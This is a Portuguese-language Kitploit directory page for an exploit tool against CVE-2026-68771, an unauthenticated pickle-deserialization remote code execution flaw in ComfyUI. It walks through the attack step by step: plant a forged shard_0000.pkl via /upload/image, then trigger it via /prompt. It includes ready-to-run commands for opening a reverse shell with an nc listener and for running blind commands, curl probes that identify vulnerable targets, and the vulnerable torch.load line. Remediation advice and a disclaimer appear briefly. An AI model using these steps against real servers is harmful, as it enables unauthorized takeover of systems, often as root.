Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-68771_exploit — Exploit não autenticado para CVE-2026-68771, um RCE por desserialização de pickle no ComfyUI. Planta um shard forjado via /upload/image, aciona-o por meio de /prompt e executa comandos ou abre um shell reverso. | Kitploit
Ferramentas/GitHubGitHub/0xdak/cve-2026-68771_exploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHub0xdak/cve-2026-68771_exploit

CVE-2026-68771_exploit

Exploit não autenticado para CVE-2026-68771, um RCE por desserialização de pickle no ComfyUI. Planta um shard forjado via /upload/image, aciona-o por meio de /prompt e executa comandos ou abre um shell reverso.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 18 diasAinda não revisado

CVE-2026-68771 — ComfyUI RCE por desserialização de Pickle sem autenticação

Execução remota de código não autenticada no ComfyUI por meio do nó LoadTrainingDataset.

LoadTrainingDataset.execute() carrega shards de dataset do diretório de saída do servidor com torch.load(f) e sem weights_only=True. No PyTorch < 2.6 (onde weights_only assume o padrão False) um shard_*.pkl propositalmente criado executa seu __reduce__ de pickle no carregamento (CWE-502). O ComfyUI é distribuído sem autenticação, e a rota /upload/image (com type=output) grava os bytes enviados em estado bruto sem verificar a extensão, de modo que um .pkl pode ser plantado e acionado em duas requisições não autenticadas.

  • Afetados: ComfyUI 0.23.0 no PyTorch < 2.6
  • Porta padrão: 8188 (sem autenticação)
  • CWE: 502 (Desserialização de Dados não Confiáveis)
  • Impacto: RCE como o usuário do processo ComfyUI (geralmente root)

Requisitos

Somente a biblioteca padrão do Python 3 — sem dependências.

Uso

root@kitploit:~
# reverse shell (start a listener first: nc -lvnp 4444)
python3 exploit.py http://10.10.10.10:8188/ --shell 10.10.14.5:4444

# blind single command
python3 exploit.py http://10.10.10.10:8188/ -c 'id > /tmp/pwned'

O comando é executado no servidor; sua saída não é retornada, então use --shell para obter um reverse shell (ou grave em um caminho legível) para observar o resultado.

Como funciona

Duas requisições não autenticadas:

  1. Plantio — POST /upload/image com type=output, subfolder=training_dataset, nome de arquivo shard_0000.pkl. A rota /upload/image grava os bytes em estado bruto (sem processamento de imagem nesse caminho), então o pickle é armazenado exatamente como enviado em output/training_dataset/shard_0000.pkl. O __reduce__ do pickle retorna (os.system, (cmd,)).

  2. Acionamento — POST /prompt com um workflow: um nó LoadTrainingDataset (folder_name=training_dataset) conectado a um nó de saída SaveLatent. O nó de saída força o ComfyUI a executar LoadTrainingDataset, que faz glob de e chama:

Identificando um alvo

root@kitploit:~
curl -s http://10.10.10.10:8188/system_stats | python3 -c "import sys,json;print(json.load(sys.stdin)['system']['comfyui_version'])"
# 0.23.0
curl -s -o /dev/null -w '%{http_code}\n' http://10.10.10.10:8188/object_info/LoadTrainingDataset
# 200  -> vulnerable node present

Remediação

  • Correção upstream: carregue shards com torch.load(f, weights_only=True).
  • Atualize o PyTorch para >= 2.6, onde weights_only assume o padrão True e o unpickler restrito rejeita os.system.
  • Nunca exponha o ComfyUI a redes não confiáveis e não o execute como usuário privilegiado.

Aviso legal

Somente para testes de segurança autorizados e fins educacionais. Use-o apenas contra sistemas que você possui ou tem permissão explícita para testar.

Baixar ferramenta
shard_*.pkl
root@kitploit:~
with open(shard_path, "rb") as f:
    shard_data = torch.load(f)      # no weights_only=True -> runs the pickle on torch < 2.6

O __reduce__ do pickle executa os.system(cmd) durante a desserialização.